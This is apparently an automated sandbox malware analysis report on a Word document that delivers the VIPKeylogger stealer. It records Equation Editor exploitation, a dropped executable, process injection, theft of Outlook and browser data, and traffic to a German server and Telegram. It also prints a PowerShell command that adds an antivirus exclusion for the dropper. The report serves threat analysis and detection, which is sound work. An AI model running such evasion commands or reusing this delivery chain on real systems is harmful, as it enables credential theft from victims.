Malware Analysis Report

2024-11-13 15:35

Sample ID 241022-1zdl4sydrm
Target 30e0259012e5808f7a34b0a9c7fba9194ae40bfa6fcba4a6f28787623a5f8cb1
SHA256 30e0259012e5808f7a34b0a9c7fba9194ae40bfa6fcba4a6f28787623a5f8cb1
Tags
vipkeylogger collection discovery execution keylogger spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

30e0259012e5808f7a34b0a9c7fba9194ae40bfa6fcba4a6f28787623a5f8cb1

Threat Level: Known bad

The file 30e0259012e5808f7a34b0a9c7fba9194ae40bfa6fcba4a6f28787623a5f8cb1 was found to be: Known bad.

Malicious Activity Summary

vipkeylogger collection discovery execution keylogger spyware stealer

VIPKeylogger

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Reads user/profile data of local email clients

Abuses OpenXML format to download file from external location

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Accesses Microsoft Outlook profiles

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

System Location Discovery: System Language Discovery

Browser Information Discovery

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Uses Task Scheduler COM API

Uses Volume Shadow Copy WMI provider

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Checks processor information in registry

Uses Volume Shadow Copy service COM API

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

outlook_office_path

Suspicious behavior: AddClipboardFormatListener

outlook_win_path

Launches Equation Editor

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-22 22:04

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-22 22:04

Reported

2024-10-22 22:06

Platform

win7-20240903-en

Max time kernel

59s

Max time network

31s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\30e0259012e5808f7a34b0a9c7fba9194ae40bfa6fcba4a6f28787623a5f8cb1.docx"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Abuses OpenXML format to download file from external location

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 484 set thread context of 3004 N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe C:\Users\Admin\AppData\Roaming\rekigobi34567.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor

exploit
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2676 wrote to memory of 484 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\rekigobi34567.exe
PID 2676 wrote to memory of 484 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\rekigobi34567.exe
PID 2676 wrote to memory of 484 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\rekigobi34567.exe
PID 2676 wrote to memory of 484 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\rekigobi34567.exe
PID 3012 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 3012 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 3012 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 3012 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 484 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 484 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 484 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 484 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 484 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe C:\Users\Admin\AppData\Roaming\rekigobi34567.exe
PID 484 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe C:\Users\Admin\AppData\Roaming\rekigobi34567.exe
PID 484 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe C:\Users\Admin\AppData\Roaming\rekigobi34567.exe
PID 484 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe C:\Users\Admin\AppData\Roaming\rekigobi34567.exe
PID 484 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe C:\Users\Admin\AppData\Roaming\rekigobi34567.exe
PID 484 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe C:\Users\Admin\AppData\Roaming\rekigobi34567.exe
PID 484 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe C:\Users\Admin\AppData\Roaming\rekigobi34567.exe
PID 484 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe C:\Users\Admin\AppData\Roaming\rekigobi34567.exe
PID 484 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\rekigobi34567.exe C:\Users\Admin\AppData\Roaming\rekigobi34567.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\rekigobi34567.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\30e0259012e5808f7a34b0a9c7fba9194ae40bfa6fcba4a6f28787623a5f8cb1.docx"

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Users\Admin\AppData\Roaming\rekigobi34567.exe

"C:\Users\Admin\AppData\Roaming\rekigobi34567.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rekigobi34567.exe"

C:\Users\Admin\AppData\Roaming\rekigobi34567.exe

"C:\Users\Admin\AppData\Roaming\rekigobi34567.exe"

Network

Country Destination Domain Proto
DE 87.120.84.38:80 87.120.84.38 tcp
DE 87.120.84.38:80 87.120.84.38 tcp
DE 87.120.84.38:80 87.120.84.38 tcp
US 8.8.8.8:53 checkip.dyndns.org udp
BR 132.226.247.73:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp

Files

memory/3012-0-0x000000002F9C1000-0x000000002F9C2000-memory.dmp

memory/3012-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/3012-2-0x0000000070FAD000-0x0000000070FB8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{79E22A1C-E48D-4510-932D-BA1F0EE34C2A}

MD5 86ecabda042bad2aa9d254725cb173ea
SHA1 aea8349cc9bdb19de77bdc9dd449321dfe049e7c
SHA256 9189af240de3977e7bd77259097eaef3da761ae4b3a086c76008e50d3cc1bf26
SHA512 660b4d56330e65ae8667345164825eef5425125d8dcbcb727417de379f0e5d86a4ea6322eb9791f1b4b9c5a02be18c01f4f84dea0a47921676dc54d2ddc63ff5

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

MD5 2b308bb62fa318a25f41975e56a05cd6
SHA1 e4107cdafd98bb8a484ca6decfee839f0cd3ee19
SHA256 cdea8f35126837d69101ce820fc37fab3944287dcce519ef7a5600a7ab539921
SHA512 241e8a9b87b8a27a8da7b18aa913510c9afcb20b0c49e9f44d9bf97c7fb300046204bb1c576b46c82104d6b23f5af036479b9f8600605f7bd3d0675439e83cef

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q0WBLVJY\7vbu8ZW8lFI8mn5[1].doc

MD5 00c4c82a063c048c37808a72ea1f04e3
SHA1 9ab87b7393168e6a3f181524ee69c818bd70cff6
SHA256 fe6dc6138bf4bd851087fcc708493877ff458ba2da42f499ced66164e8e9dcd2
SHA512 5194e8fc20dccdec0b1b7f7a30a500a4696868646ab9adc7e8974e737ebaf2191aa0cac1bc50dbe89c6623598fcbb3505c0ff46ec9114d94aacf3caa8dfed3d1

\Users\Admin\AppData\Roaming\rekigobi34567.exe

MD5 07188bef748562cde18f2b77f76bae94
SHA1 70f3fddd3fb0030e4e7422a41d560374c463e1dc
SHA256 2a53872f573a1817be1848779e60c7db22501badc0afd7f364ee30a77dce3395
SHA512 fab75b7746af8b04bda1361737d47e33bb770be79872830722bf4affe2231d222c01032f73f48d92268027a20e0eb230c7c8ff3a94b6813b2ce4dd445e6ddf94

memory/484-94-0x0000000000A10000-0x0000000000ACC000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/3012-102-0x0000000070FAD000-0x0000000070FB8000-memory.dmp

memory/484-103-0x00000000004C0000-0x00000000004DC000-memory.dmp

memory/484-104-0x0000000005230000-0x00000000052BA000-memory.dmp

memory/3004-116-0x0000000000400000-0x0000000000448000-memory.dmp

memory/3004-118-0x0000000000400000-0x0000000000448000-memory.dmp

memory/3004-114-0x0000000000400000-0x0000000000448000-memory.dmp

memory/3004-113-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/3004-111-0x0000000000400000-0x0000000000448000-memory.dmp

memory/3004-109-0x0000000000400000-0x0000000000448000-memory.dmp

memory/3004-107-0x0000000000400000-0x0000000000448000-memory.dmp

memory/3004-105-0x0000000000400000-0x0000000000448000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-22 22:04

Reported

2024-10-22 22:06

Platform

win10v2004-20241007-en

Max time kernel

51s

Max time network

43s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\30e0259012e5808f7a34b0a9c7fba9194ae40bfa6fcba4a6f28787623a5f8cb1.docx" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeAuditPrivilege N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\30e0259012e5808f7a34b0a9c7fba9194ae40bfa6fcba4a6f28787623a5f8cb1.docx" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 133.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
DE 87.120.84.38:80 87.120.84.38 tcp
DE 87.120.84.38:80 87.120.84.38 tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 38.84.120.87.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 10.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.18.27.153:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 139.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 153.27.18.2.in-addr.arpa udp

Files

memory/2712-0-0x00007FF9ADC70000-0x00007FF9ADC80000-memory.dmp

memory/2712-1-0x00007FF9EDC8D000-0x00007FF9EDC8E000-memory.dmp

memory/2712-3-0x00007FF9ADC70000-0x00007FF9ADC80000-memory.dmp

memory/2712-4-0x00007FF9ADC70000-0x00007FF9ADC80000-memory.dmp

memory/2712-2-0x00007FF9ADC70000-0x00007FF9ADC80000-memory.dmp

memory/2712-6-0x00007FF9EDBF0000-0x00007FF9EDDE5000-memory.dmp

memory/2712-5-0x00007FF9EDBF0000-0x00007FF9EDDE5000-memory.dmp

memory/2712-7-0x00007FF9ADC70000-0x00007FF9ADC80000-memory.dmp

memory/2712-9-0x00007FF9EDBF0000-0x00007FF9EDDE5000-memory.dmp

memory/2712-12-0x00007FF9EDBF0000-0x00007FF9EDDE5000-memory.dmp

memory/2712-11-0x00007FF9EDBF0000-0x00007FF9EDDE5000-memory.dmp

memory/2712-10-0x00007FF9EDBF0000-0x00007FF9EDDE5000-memory.dmp

memory/2712-13-0x00007FF9AB3F0000-0x00007FF9AB400000-memory.dmp

memory/2712-8-0x00007FF9EDBF0000-0x00007FF9EDDE5000-memory.dmp

memory/2712-14-0x00007FF9AB3F0000-0x00007FF9AB400000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VKYZDMA5\7vbu8ZW8lFI8mn5[1].doc

MD5 00c4c82a063c048c37808a72ea1f04e3
SHA1 9ab87b7393168e6a3f181524ee69c818bd70cff6
SHA256 fe6dc6138bf4bd851087fcc708493877ff458ba2da42f499ced66164e8e9dcd2
SHA512 5194e8fc20dccdec0b1b7f7a30a500a4696868646ab9adc7e8974e737ebaf2191aa0cac1bc50dbe89c6623598fcbb3505c0ff46ec9114d94aacf3caa8dfed3d1

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 d0969496f22839aca2df225cf2f94e32
SHA1 853a7239899684c34322e79c113dbcb2bcb1f6bc
SHA256 e2612049559fa09c8a122336a0440051d670967a8764ee9f5cbba901a91ee444
SHA512 22ea5f47507f63a76df881e139b7140b23581af439b31f12c34bdde2bcbfb0c6b03958d8ff8f8a72357f7316e36bbeea62c9c03c982de1f8a55b625f4f61f543

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 d29962abc88624befc0135579ae485ec
SHA1 e40a6458296ec6a2427bcb280572d023a9862b31
SHA256 a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA512 4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

memory/2712-74-0x00007FF9EDBF0000-0x00007FF9EDDE5000-memory.dmp

memory/2712-76-0x00007FF9EDBF0000-0x00007FF9EDDE5000-memory.dmp

memory/2712-75-0x00007FF9EDC8D000-0x00007FF9EDC8E000-memory.dmp

memory/2712-77-0x00007FF9EDBF0000-0x00007FF9EDDE5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TCDFD06.tmp\iso690.xsl

MD5 ff0e07eff1333cdf9fc2523d323dd654
SHA1 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA256 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512 b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d